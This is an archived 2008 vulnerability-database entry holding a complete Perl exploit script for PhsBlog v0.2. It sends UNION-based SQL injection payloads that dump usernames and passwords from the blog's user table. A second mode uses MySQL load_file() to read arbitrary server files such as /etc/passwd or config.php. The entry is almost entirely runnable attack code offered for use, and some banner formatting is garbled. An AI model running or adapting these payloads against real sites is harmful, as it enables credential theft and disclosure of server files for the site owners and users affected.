PhsBlog v0.2 Bypass Sql injection Filtering Exploit

2008-09-13T00:00:00
ID SECURITYVULNS:DOC:20508
Type securityvulns
Reporter Securityvulns
Modified 2008-09-13T00:00:00

Description

!/usr/bin/perl

----------------------------------------------------------------

Script : PhsBlog v0.2

Type : Bypass Sql injection Filtering Exploit

Method : GET

Risk : High

----------------------------------------------------------------

Discovered by : Khashayar Fereidani a.k.a. Dr.Crash

My Official Website : HTTP://FEREIDANI.IR

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com

----------------------------------------------------------------

Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR

----------------------------------------------------------------

Script Download : http://www.phsdev.com/downloads/phsblog_current.zip

----------------------------------------------------------------

Tnx : God

HTTP://IRCRASH.COM

----------------------------------------------------------------

use LWP; use HTTP::Request; use Getopt::Long;

$scriptname="PhsBlog v0.2";

sub header { print "


  • $scriptname

Discovered by : Khashayar Fereidani * Exploited by : Khashayar Fereidani * My Official Website : http://fereidani.ir * *********"; }

sub usage { print " * Usage : perl $0 http://Example/


"; }

$url = ($ARGV[0]);

if(!$url) { header(); usage(); exit; } if($url !~ /\//){$url = $url."/";} if($url !~ /http:\/\//){$url = "http://".$url;} sub xpl1() {

concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)

$vul = "/index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),6,7,8,9,10,11,12+from+phsblog_users/*"; $requestpage = $url.$vul;

my $req = HTTP::Request->new("POST",$requestpage); $ua = LWP::UserAgent->new; $ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );

$req->referer($url);

$req->referer("IRCRASH.COM"); $req->content_type('application/x-www-form-urlencoded'); $req->header("content-length" => $contlen); $req->content($poststring);

$response = $ua->request($req); $content = $response->content; $header = $response->headers_as_string();

@name = split(/Login:/,$content); $name = @name[1]; @name = split(/<enduser>/,$name); $name = @name[0];

@password = split(/Password:/,$content); $password = @password[1]; @password = split(/<endpass>/,$password); $password = @password[0];

if(!$name && !$password) { print "\n\n"; print "!Exploit failed ! :(\n\n"; exit; }

print "\n Username: ".$name."\n\n"; print " Password: " .$password."\n\n";

}

XPL2

sub xpl2() { print "\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd"; print "\n Enter File Address :"; $fil3 = <stdin>;

index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),6,7,8,9,10,11,12+from+phsblog_users/*

$vul = "?show=pickup&sid=99999'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*"; $requestpage = $url.$vul;

my $req = HTTP::Request->new("POST",$requestpage); $ua = LWP::UserAgent->new; $ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );

$req->referer($url);

$req->referer("IRCRASH.COM"); $req->content_type('application/x-www-form-urlencoded'); $req->header("content-length" => $contlen); $req->content($poststring);

$response = $ua->request($req); $content = $response->content; $header = $response->headers_as_string();

@name = split(/Login:/,$content); $name = @name[1]; @name = split(/<enduser>/,$name); $name = @name[0];

if(!$name && !$password) { print "\n\n"; print "!Exploit failed ! :(\n\n"; exit; }

open (FILE, ">".source.".txt"); print FILE $name; close (FILE); print " File Save In source.txt\n"; print "";

}

XPL2 END

Starting;

print "


  • $scriptname

Discovered by : Khashayar Fereidani * Exploited by : Khashayar Fereidani * *My Official Website : http://fereidani.ir *


  • Mod Options : *
  • Mod 1 : Find Script username and password *
  • Mod 2 : File Disclosure(not work in many servers) *********"; print "\n \n Enter Mod : "; $mod=<stdin>; if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } else { print "\n Unknown Mod ! \n Exploit Failed !"; }; if ($mod=="1") { xpl1(); }; if ($mod=="2") { xpl2(); };